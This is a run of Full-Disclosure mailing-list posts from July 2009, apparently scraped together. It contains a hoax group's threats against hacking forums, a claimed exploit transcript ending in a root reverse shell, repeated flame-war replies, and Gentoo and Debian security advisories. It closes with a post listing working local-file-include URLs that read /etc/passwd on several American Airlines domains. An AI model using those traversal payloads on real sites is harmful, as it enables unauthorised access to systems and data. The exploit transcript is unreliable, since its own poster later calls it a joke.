n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com http://blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] n3td3v is posting as ant-sec
careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
I was about to tarball my directory of XSS 0days for them... Thanks Ureleet! /typical fd post -Travis On Thu, Jul 16, 2009 at 8:54 AM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
Apparently N3tty has returned, or, God forbid, he has procreated My money is on a return, given the Gmail addy 2009/7/16 Ant-Sec Movement anti.sec.movem...@gmail.com The Anti-Sec movement is not just one person. We are a group of people from all over the world. We are almost a culture unto ourselves. We are threaded throughout the spokes of everyday life. We have committed no crimes - our endeavors will ultimately cut down computer crime to some degree. The amount of innocent people getting hit with financial losses as a result of malicious computer hacking will decrease significantly because hacker communities like Blackhat-forums and Astalavista have been terminated - or at least for a time, which is still a gain. This is ultimately a hacker war. Furthermore, the Poster of this message is merely a standard bearer of a faction of the Anti-Sec Movement. The Poster of this message is not a hacker, but is merely reporting the movements of Anti-Sec. Sincerely, -anti-sec Please check out our website at: http://romeo.copyandpaste.info/ On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com wrote: Seriously, you're as delusional as these radical movements who blow up buildings and kill people preaching how they feel the West is wrong and old ways are best. I see a lot of parallels between them and you. You need help, you need a new hobby. Taking down these sites is as productive as masturbation. It feels good yes, but is it really that satisfying? Nevermind that, you will do what you think is in your movement's best interest. Regardless, I wish you well in your endeavors. Hope the FBI talk to you eventually as you're infringing on the first amendment :) Ant-Sec Movement wrote: Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com http://blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
HAH! I knew it On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
now we know who antisec are/is, i'm going to bed Charles Majola wrote: HAH! I knew it On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
Ureleet wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. Common, n3td3v couldn't hack in any form. However much we might disagree with anti-sec they are still several leagues above n3td3v. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
Hehehe, netdev? For real?. He is the Anti-sec. I think thats wrong
On Thu, Jul 16, 2009 at 1:35 PM, Benjamin
Cancecance.consult...@gmail.com wrote:
now we know who antisec are/is, i'm going to bed
Charles Majola wrote:
HAH!
I knew it
On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote:
careful. n3td3v has found his way back onto the list. he is now
posting as ant-sec. he is hacking and spreading disinformation on
full-d.
careful who you talk 2, he has many names.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200907-13 ] PulseAudio: Local privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200907-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PulseAudio: Local privilege escalation Date: July 16, 2009 Bugs: #276986 ID: 200907-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability in PulseAudio may allow a local user to execute code with escalated privileges. Background == PulseAudio is a network-enabled sound server with an advanced plug-in system. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/pulseaudio 0.9.9-r54 = 0.9.9-r54 Description === Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. The vulnerability has independently been reported to oCERT by Yorick Koster. Impact == A local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges. Workaround == Ensure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users. Resolution == All PulseAudio users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v =media-sound/pulseaudio-0.9.9-r54 References == [ 1 ] CVE-2009-1894 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1894 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200907-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. Interesting theory, but do you have any evidence that backs this up? I'm not so sure if n3td3v is back, though it would be funny. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
On Wed, 15 Jul 2009 12:41:02 BST, mrx said: ii) Backed up and mirrored the content so that they could be back up in 24 hours. Strictly speaking, any site that gives a flying f**k in a rolling donut about their availability should be doing this *anyhow*, even if they aren't worried about getting hacked. Statistically, you're more likely to hear the sound of a disk drive head going into oxide-plow mode or the click-click-click of a dead servo platter than you are being hacked. And you're gonna want backups then. And no, doing RAID isn't a cure-all. If there's a fire, all the disks burn. If there's a plumbing leak upstairs that spills zillions of gallons of water through your hardware, all the disks spark and short out. Plus, I've seen enough RAID controllers take a crap all over all the disks far too many times in my career. pgpS1jCB88wGn.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We have terminated blackhat-forums.com. Are you scared now Hackforums.net?
On Thu, 16 Jul 2009 19:18:33 +1000, Ant-Sec Movement said: Get trusted. Trust no one. What happens if the guy who's trust you are trying to get happens to believe in this as well? Basic theory of protocols (both computer and human): To be successful, they must be capable of self-interoperation. pgpfgxtkv82AK.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1836-1] New fckeditor packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1836-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff July 16, 2009 http://www.debian.org/security/faq - Package: fckeditor Vulnerability : missing input sanitising Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-2265 Vinny Guido discovered that multiple input sanitising vulnerabilities in Fckeditor, a rich text web editor component, may lead to the execution of arbitrary code. The old stable distribution (etch) doesn't contain fckeditor. For the stable distribution (lenny), this problem has been fixed in version 1:2.6.2-1lenny1. For the unstable distribution (sid), this problem has been fixed in version 1:2.6.4.1-1. We recommend that you upgrade your fckeditor package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2.orig.tar.gz Size/MD5 checksum: 934845 8b58da54703e47622e07b8fdc9f5f93d http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.diff.gz Size/MD5 checksum:25408 2e10c633f28bdffa1afda0918783ac9e http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1.dsc Size/MD5 checksum: 1028 489da6d230d86e6347c2f5839ffd0af3 Architecture independent packages: http://security.debian.org/pool/updates/main/f/fckeditor/fckeditor_2.6.2-1lenny1_all.deb Size/MD5 checksum: 945672 5a0d59f390945ab2df02c43be8e81a5c These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkpfaV4ACgkQXm3vHE4uyloLvwCgkzaouu6V8TbisSreuf6VCuWF 6pUAoNEqmfVDU0LffLY8hdh7NIHGzYvK =WDKk -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
No. It is the Illuminati and their New World Order On Jul 16, 2009, at 5:51 AM, Ureleet wrote: n3td3v? iz that u? lying again? do i need 2 bust u out? On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec Movementanti.sec.movem...@gmail.com wrote: The Anti-Sec movement is not just one person. We are a group of people from all over the world. We are almost a culture unto ourselves. We are threaded throughout the spokes of everyday life. We have committed no crimes - our endeavors will ultimately cut down computer crime to some degree. The amount of innocent people getting hit with financial losses as a result of malicious computer hacking will decrease significantly because hacker communities like Blackhat- forums and Astalavista have been terminated - or at least for a time, which is still a gain. This is ultimately a hacker war. Furthermore, the Poster of this message is merely a standard bearer of a faction of the Anti-Sec Movement. The Poster of this message is not a hacker, but is merely reporting the movements of Anti-Sec. Sincerely, -anti-sec Please check out our website at: http://romeo.copyandpaste.info/ On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance cance.consult...@gmail.com wrote: Seriously, you're as delusional as these radical movements who blow up buildings and kill people preaching how they feel the West is wrong and old ways are best. I see a lot of parallels between them and you. You need help, you need a new hobby. Taking down these sites is as productive as masturbation. It feels good yes, but is it really that satisfying? Nevermind that, you will do what you think is in your movement's best interest. Regardless, I wish you well in your endeavors. Hope the FBI talk to you eventually as you're infringing on the first amendment :) Ant-Sec Movement wrote: Blend in. Get trusted. Trust no one. Own everyone. Disclose nothing. Destroy everything. Take back the scene. Never sell out, never surrender. Get in as anonymous, Leave with no trace. -- Dear Jesse Labrocca (Omniscient) and Hackforums.net, The Anti-Sec movement has officially terminated Blackhat-forums.com using yet ANOTHER 0-day exploit that we have discovered. This one takes advantage of a previously undisclosed LiteSpeed vulnerability. This is primarily to prove that we are serious and committed to our primary goal - eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review - and learn from. The Anti-Sec movement hopes Hackrforums.net now understands that our cyber war against you is NOT a joke. We will be terminating Hackforums.net. You are our number one target...we want to savor the moment and the suspense. We will strike when you least expect it. This we promise. Here is a brief transcript of the hacking of Blackhat-forums.com: - anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com http://blackhat-forums.com -p80 [+] Connecting to blackhat-forums.com:80 http://blackhat-forums.com:80 [+] Connected Successfully! [+] Checking for Lightspeed vulnerability... [+] Vulnerable! [+] Sending exploit [-] Phase 1 [-] Phase 2 [-] Phase 3 [+] Injecting Shellcode... [+] Waiting for reverse shell... [~] Connected to shell @ 74.86.203.65! snip uid=0(root) gid=0 (root) groups=0 (root) snip --- By terminating Blackhat-forums.com, we have furthered our goals in more ways than one. We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information. Take out two birds with one stone. Sincerely, -anti-sec ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ NOTICE: This email and any attachments may contain confidential and proprietary information of NetSuite Inc. and is for the sole use of the intended recipient for the stated purpose. Any improper use or distribution is prohibited. If you are not the intended recipient, please notify the
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
On Jul 16, 2009, at 3:00 AM, Ant-Sec Movement wrote: The Anti-Sec movement is not just one person. We are a group of people from all over the world. We are almost a culture unto ourselves. We are threaded throughout the spokes of everyday life. So basically, you are legion, for you are many? If that is true, then you can be infiltrated just like any other organization/society/cult. Is it that you are so sex-depraved as a result of living in your mom's basement and running Noobuntu on a Pentium III that gives you a burning desire to troll us all with this charade? It will only be a matter of time before someone leaks inside information revealing Anti- Sex to be the weak troll group as we all suspect. Why hasn't blackhat-forums.com brought their site back up yet? Only a complete dolt couldn't delete the .htaccess undoing the 501 you set up. Either this Jesse Labrocca is a pseudonym of an insider who is going along with your little charade, or he is an easy target. If Anti-Sex is as vast as you lead us to believe, then pick on someone your own size, buddy. We will only eat crow when you own up to pwning milw0rm. Also, whois blackhat-forums.com. Is Jesse Labrocca a pseudonym for Chris Morganti in Melbourne Australia? And who are the Canadian Allstream customer and the Brazilian who ran a Metasploit scan on me for a couple of hours yesterday after I challenged you to pwn my website http://narc.oti.cz? I am sure they won't appreciate me divulging their IPs: 189.78.142.169 and 142.161.169.106. Also, for your enjoyment, here is a list of hosts that vuln-scanned or visited http://narc.oti.cz after my full-d post yesterday: http://pastebin.ca/1496587 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ant-Sec - We are going to terminate Hackforums.net and Milw0rm.com - New Apache 0-day exploit uncovered
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 snip I've seen enough RAID controllers take a crap all over all the disks far too many times in my career. /snip http://www.channelregister.co.uk/2009/03/23/carbonite_sues_promise/ Sound familiar? On Thu, 16 Jul 2009 13:52:16 -0400 valdis.kletni...@vt.edu wrote: On Wed, 15 Jul 2009 12:41:02 BST, mrx said: ii) Backed up and mirrored the content so that they could be back up in 24 hours. Strictly speaking, any site that gives a flying f**k in a rolling donut about their availability should be doing this *anyhow*, even if they aren't worried about getting hacked. Statistically, you're more likely to hear the sound of a disk drive head going into oxide-plow mode or the click-click-click of a dead servo platter than you are being hacked. And you're gonna want backups then. And no, doing RAID isn't a cure-all. If there's a fire, all the disks burn. If there's a plumbing leak upstairs that spills zillions of gallons of water through your hardware, all the disks spark and short out. Plus, I've seen enough RAID controllers take a crap all over all the disks far too many times in my career. -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkpfexMACgkQi04xwClgpZhBpwP7BvfRf0k+OLUo2CHc5XNXWIijTrt0 9Xrt8XOQe4RaaFSkp6QpAuHKoboklRAi8pe7bxPJWMiFxi+WSxFQaU0apnHElRn3DaRt 0RpKdPzh+LOAz5nozGYInH5SisHdQXvGpGVIHnjMUhTdA+u3wVMNlW7ledYeFHJR5Dm7 oteYBis= =gGMH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
N3td3v made comment earlier today on Twitter about messing with the mind of his enemies. Gave him a dose of his own medicine. Now he is panicing. Twitter.com/n3td3v Got u kid. Fuxk off. O and don't follow him. He likes it. In fact, if u r a n3td3v follower unsub from his bullshit. I don't know if he's ant-sec, but I wuldnt b surprised. On Thursday, July 16, 2009, kfc.ru...@gmail.com kfc.ru...@gmail.com wrote: On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. Interesting theory, but do you have any evidence that backs this up? I'm not so sure if n3td3v is back, though it would be funny. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
nope
i think these guys they miss the darkcore underground warez era
when the 0-day stuff was able only for the few and the really good
underground ppl. Well somehow i miss the 90s too but thats life
,things changing !
___ / / _ __ _ _
/ __ `__ \/ __ \/ __ /_/ ___/ __ `/ | / / _ \/ ___/
/ / / / / / /_/ / /_/ /_/ / / /_/ /| |/ / __/ /
/_/ /_/ /_/\/\__,_/ /_/ \__,_/ |___/\___/_/
On Thu, 16 Jul 2009 20:34:52 +0200 John Menerick
jmener...@netsuite.com wrote:
No. It is the Illuminati and their New World Order
On Jul 16, 2009, at 5:51 AM, Ureleet wrote:
n3td3v? iz that u? lying again? do i need 2 bust u out?
On Thu, Jul 16, 2009 at 6:00 AM, Ant-Sec
Movementanti.sec.movem...@gmail.com wrote:
The Anti-Sec movement is not just one person. We are a group of
people from
all over the world. We are almost a culture unto ourselves. We
are
threaded
throughout the spokes of everyday life.
We have committed no crimes - our endeavors will ultimately cut
down
computer crime to some degree. The amount of innocent people
getting hit
with financial losses as a result of malicious computer hacking
will
decrease significantly because hacker communities like Blackhat-
forums and
Astalavista have been terminated - or at least for a time,
which is
still a
gain.
This is ultimately a hacker war.
Furthermore, the Poster of this message is merely a standard
bearer
of a
faction of the Anti-Sec Movement. The Poster of this message is
not a
hacker, but is merely reporting the movements of Anti-Sec.
Sincerely,
-anti-sec
Please check out our website at:
http://romeo.copyandpaste.info/
On Thu, Jul 16, 2009 at 7:39 PM, Benjamin Cance
cance.consult...@gmail.com
wrote:
Seriously, you're as delusional as these radical movements who
blow up
buildings and kill people preaching how they feel the West
is
wrong
and old ways are best. I see a lot of parallels between them
and
you.
You need help, you need a new hobby. Taking down these sites
is as
productive as masturbation. It feels good yes, but is it
really that
satisfying? Nevermind that, you will do what you think is in
your
movement's best interest.
Regardless, I wish you well in your endeavors. Hope the FBI
talk
to you
eventually as you're infringing on the first amendment :)
Ant-Sec Movement wrote:
Blend in.
Get trusted.
Trust no one.
Own everyone.
Disclose nothing.
Destroy everything.
Take back the scene.
Never sell out, never surrender.
Get in as anonymous, Leave with no trace.
--
Dear Jesse Labrocca (Omniscient) and Hackforums.net,
The Anti-Sec movement has officially terminated Blackhat-
forums.com
using yet ANOTHER 0-day exploit that we have discovered. This
one
takes advantage of a previously undisclosed LiteSpeed
vulnerability.
This is primarily to prove that we are serious and committed
to our
primary goal - eradicating full-disclosure of computer
vulnerabilities
and exploits, and terminating general discussion of hacking
for any
n00b and script-kiddie to read and review - and learn from.
The Anti-Sec movement hopes Hackrforums.net now understands
that
our
cyber war against you is NOT a joke. We will be terminating
Hackforums.net. You are our number one target...we want to
savor
the
moment and the suspense. We will strike when you least expect
it.
This
we promise.
Here is a brief transcript of the hacking of Blackhat-
forums.com:
--
---
anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com
http://blackhat-forums.com -p80
[+] Connecting to blackhat-forums.com:80 http://blackhat-
forums.com:80
[+] Connected Successfully!
[+] Checking for Lightspeed vulnerability...
[+] Vulnerable!
[+] Sending exploit
[-] Phase 1
[-] Phase 2
[-] Phase 3
[+] Injecting Shellcode...
[+] Waiting for reverse shell...
[~] Connected to shell @ 74.86.203.65!
snip
uid=0(root) gid=0 (root) groups=0 (root)
snip
---
By terminating Blackhat-forums.com, we have furthered our
goals in
more ways than one.
We are coming for you hackforums.net...and Milw0rm.com. We
haven't
forgotten you, Milw0rm. Our juicy Apache 0-day will terminate
both
websites, which will cause a major blow to those who support
full-disclosure of hacking related information.
Take out two birds with one stone.
Sincerely,
-anti-sec
--
--
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter:
[Full-disclosure] Anti-Sec - We're not really Anti-Sec! Sorry Hackforums. It was all a big joke by anonymous!
Yes, that's right, we're not really Anti-Sec. We have no 0-day exploits. We did not hack ImageShack or Blackhat-forums or Astalavista. That was the real Anti-Sec whomever they are. It was all a big joke. But our goal was achieved. We caused a huge stir on Hackforums.net. We've made them look like utter fools. Geez, some of them are like Let's go to the authorities! Mummy and Daddy I wanna go to authorities because my hacking forum has been threatened. What a bunch of wimps. You're on a hacking website. You've gotta expect these things. It's all part of the deal. We've proved one thing...none of you on Hackforums.net should be there...not even Jesse Labrocca. He should spend more time with his family rather then worry about a silly little hacking forum. Or maybe spend more time on your money-making business. Silly person. Sincerely, Anonymous People ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We're not really Anti-Sec! Sorry Hackforums. It was all a big joke by anonymous!
Gee, we didn't see that coming or anything. On Jul 16, 2009, at 2:32 PM, Ant-Sec Movement wrote: Yes, that's right, we're not really Anti-Sec. We have no 0-day exploits. We did not hack ImageShack or Blackhat-forums or Astalavista. That was the real Anti-Sec whomever they are. It was all a big joke. But our goal was achieved. We caused a huge stir on Hackforums.net. We've made them look like utter fools. Geez, some of them are like Let's go to the authorities! Mummy and Daddy I wanna go to authorities because my hacking forum has been threatened. What a bunch of wimps. You're on a hacking website. You've gotta expect these things. It's all part of the deal. We've proved one thing...none of you on Hackforums.net should be there...not even Jesse Labrocca. He should spend more time with his family rather then worry about a silly little hacking forum. Or maybe spend more time on your money-making business. Silly person. Sincerely, Anonymous People ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anti-Sec - We have Terminated Blackhat-forums. Are you scared now HackForums?
How has it changed? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] American Airlines (multiple domains) Local File Include
American Airlines' domains have been vulnerable to Local file Include (I wonder if anyone has flown free using this) http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.be/aa/i18nForward.do?locale=en_GBp=../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 